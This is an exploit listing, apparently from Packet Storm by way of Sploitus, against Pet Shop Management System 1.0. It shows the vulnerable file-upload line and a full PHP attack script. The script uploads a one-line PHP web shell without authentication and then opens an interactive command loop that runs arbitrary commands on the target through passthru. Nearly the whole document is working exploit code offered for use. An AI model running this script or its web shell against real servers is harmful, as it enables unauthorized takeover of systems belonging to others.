Share
## https://sploitus.com/exploit?id=PACKETSTORM:164335
# Title: Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)  
# Date: 28.09.2021  
# Author: Mr.Gedik  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14962/petshop-management-system-using-phppdo-oop-full-source-code-complete.html  
# Version: 1.0  
# https://asciinema.org/a/mjRFsUvshjGIcTsped1PAH8CB  
  
  
Vulnerable code controllers/add_petmanagement.php  
Line 21 - move_uploaded_file($_FILES["images"]["tmp_name"],  
$_SERVER['DOCUMENT_ROOT']."/Petshop_Management_System/uploads/" .  
addslashes($_FILES["images"]["name"]));  
  
Exploit  
#############  
  
<?php  
/*  
@author:mrgedik  
*/  
function anim($msg, $time)  
{  
$msg = str_split($msg);  
foreach ($msg as $ms) {  
echo $ms;  
usleep($time);  
}  
}  
  
anim("__ __ _____ _ _ _  
| \/ | / ____| | (_) |  
| \ / |_ __| | __ ___ __| |_| | __  
| |\/| | '__| | |_ |/ _ \/ _` | | |/ /  
| | | | |_ | |__| | __/ (_| | | <  
|_| |_|_(_) \_____|\___|\__,_|_|_|\_\  
", 900);  
  
echo PHP_EOL;  
while(1)  
{  
echo anim("Target (http://example.com/path/): ", 800);  
$target = trim(fgets(STDIN));  
echo PHP_EOL;  
if (filter_var($target, FILTER_VALIDATE_URL) === FALSE) {  
echo "Not a valid URL".PHP_EOL;  
}else {  
break;  
}  
}  
@unlink("exp.php");  
$fw = fopen("exp.php","a+");  
fwrite($fw,'<?php $_POST[m]($_POST[g]); ?>');  
fclose($fw);  
  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);  
curl_setopt($ch, CURLOPT_URL, $target."/controllers/add_petmanagement.php");  
$fields = [  
'images' => new \CurlFile("exp.php", 'image/png', 'exp.php')  
];  
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields);  
  
  
$response = curl_exec($ch);  
@unlink("exp.php");  
  
if(strstr($response,"success"))  
{  
while(1)  
{  
echo anim("root@pwn: ", 800);  
$command = trim(fgets(STDIN));  
if($command == trim("exit"))  
{  
exit;  
}  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL,$target."/uploads/exp.php");  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS,"m=passthru&g=".trim($command));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
echo curl_exec($ch);  
curl_close ($ch);  
}  
}else  
{  
echo anim("Fail", 800);  
}  
  
  
?>